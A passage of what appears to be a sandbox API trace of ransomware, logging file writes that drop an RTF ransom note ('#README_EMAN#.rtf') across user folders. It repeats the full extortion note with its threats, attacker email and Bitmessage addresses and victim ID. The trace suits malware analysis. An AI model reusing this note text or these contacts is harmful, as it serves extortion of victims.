:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.599] WriteFile (in: hFile=0x2cc, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.622] CloseHandle (hObject=0x2cc) returned 1 [0298.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#readme_eman#.rtf")) returned 0x20 [0298.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#readme_eman#.rtf")) returned 0x20 [0298.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\#readme_eman#.rtf")) returned 0x20 [0298.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\#readme_eman#.rtf")) returned 0xffffffff [0298.622] GetLastError () returned 0x2 [0298.622] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.664] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b 